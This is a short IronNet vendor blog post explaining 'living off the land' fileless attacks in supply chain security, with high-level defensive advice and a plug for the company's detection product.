IronNet Blog

What are "living off the land" attacks?

Written by IronNet | Sep 29, 2020 5:40:50 PM

"Indirect attacks against weak links in the supply chain now account for 40 percent of security breaches," according to Accenture Security's State of Cybersecurity Report 2020. Companies across sectors have been shoring up their cybersecurity defenses with technologies such as firewalls, endpoint protection, and Network Detection and Response, but one area remains overlooked: Securing the supply chain.

While the objectives of supply chain attacks differ, the tools, tactics, and procedures are not commonly any different from traditional cyber attacks. Understanding the most common attacks, however, will allow you to plan and prepare response plans.

One common tactic is called a "living off the land" attack (a fileless malware attack). This tactic has recently become more popular. It can best be described as gaining additional access using the tools that already exist in the computing environment. This makes detection and reconstruction of the compromise timeline increasingly difficult. Systems that are often targeted are IT/help desk tools, system patching infrastructure, security vulnerability scanners, and “system accounts” with global administrative permissions. Once the attacker has compromised these environments, they often have the access required to compromise the targeted systems and/or data undetected.

How to defend against a fileless malware attack

Creating an application safe list, logging, and behavioral detection, such as IronNet's Network Detection and Response solution IronDefense, are needed to stop these kinds of attacks. Common techniques are well documented at https://lolbas-project.github.io/ and https://attack.mitre.org.

Discover how to strengthen supply chain security in IronNet's latest white paper.